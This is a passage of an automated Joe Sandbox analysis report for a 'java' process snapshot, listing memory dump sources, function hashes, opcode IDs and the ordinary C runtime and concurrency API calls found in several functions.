                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                        • String ID:
                                        • API String ID: 2933794660-0
                                        • Opcode ID: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction ID: 6d43d416b674bed1456ca5691c1d7ad265ccc21b74b9a624b5fe8f7d79d50010
                                        • Opcode Fuzzy Hash: a97b86fa2f70688a7d9bd2c8f00a38e5f6966c30de59eb49ea82c316ffeec9f8
                                        • Instruction Fuzzy Hash: F6113022B14F018AFF00DF60E9542B833A4F729758F481E31EA6D967A8EF7CD1548340
                                        APIs
                                          • Part of subcall function 00007FF65E1FCCF0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FCE9A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,Security,System,?,?,?,00007FF65E1FAFB7), ref: 00007FF65E1FAA94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                        • String ID: Security$System
                                        • API String ID: 73155330-2661570791
                                        • Opcode ID: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction ID: 211c1d34b547d944f82fedf67f810514d18c866ed9c6492fb2498475f5df9594
                                        • Opcode Fuzzy Hash: 50d799d0bf03d6ab0226f341a1398c31d653080fcac9ab1f781c5d39ff046ff4
                                        • Instruction Fuzzy Hash: 6EE17062E04A8184EF218B25D6502BC27A1FB64B98F4C8136EF6D67799DF7CD494C3A0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID: System
                                        • API String ID: 118556049-3470857405
                                        • Opcode ID: 57678324b38aa7e480f2cd16bb7a8dde75a9da3e65f6b744abac7cf6ebda5980
                                        • Instruction ID: 1c33468e8468b14bb920a35cd8395b5652d5232546caa3f8119a0008dad5b2e7
                                        • Opcode Fuzzy Hash: 57678324b38aa7e480f2cd16bb7a8dde75a9da3e65f6b744abac7cf6ebda5980
                                        • Instruction Fuzzy Hash: 3B41F522B19B8581EE20CB24D2101B86B50EB68BA4F1CC731EE7E637D6DE3CE481D350
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FCCE8
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FCCE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Security
                                        • API String ID: 1934640635-1022211991
                                        • Opcode ID: 7af52754fcb6c03aff77bb4b83069b5f5df2d5dc748e781ff3ebe458f5971933
                                        • Instruction ID: 2cbd82130f27ecdc7545f0202fa94d734d13d14f1494ca2e81912b52c98e4f1a
                                        • Opcode Fuzzy Hash: 7af52754fcb6c03aff77bb4b83069b5f5df2d5dc748e781ff3ebe458f5971933
                                        • Instruction Fuzzy Hash: 5C31C022B1468581EE24CB69D6003B82750EB65FA0F8C4A31EE3DA77C5DE3CE481D394
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F8661
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F8710
                                          • Part of subcall function 00007FF65E1FD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: System
                                        • API String ID: 1934640635-3470857405
                                        • Opcode ID: 1c72af7aff1db80b111292cff93d5bea67a3922ce020ff7019f13d82da7afb30
                                        • Instruction ID: 4c1e07f9c44e4f0367a708b10871a82fa7ec47152611ba894bd75d73d8a6ea88
                                        • Opcode Fuzzy Hash: 1c72af7aff1db80b111292cff93d5bea67a3922ce020ff7019f13d82da7afb30
                                        • Instruction Fuzzy Hash: 94412572619B4286EE209F11EA40269B3A4FB687D0F184231EAAD93BA5DF3CD491C350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _dsignmemset
                                        • String ID: 0$null
                                        • API String ID: 210716287-2239106201
                                        • Opcode ID: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction ID: dbddb61b9514f961225cdb9d435f04041741e05f7c8284af02205590c5edc693
                                        • Opcode Fuzzy Hash: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction Fuzzy Hash: 7F31A222618BC585DB619F29E1403EAB360FF94B84F489222EB8D53755EF3CE585C710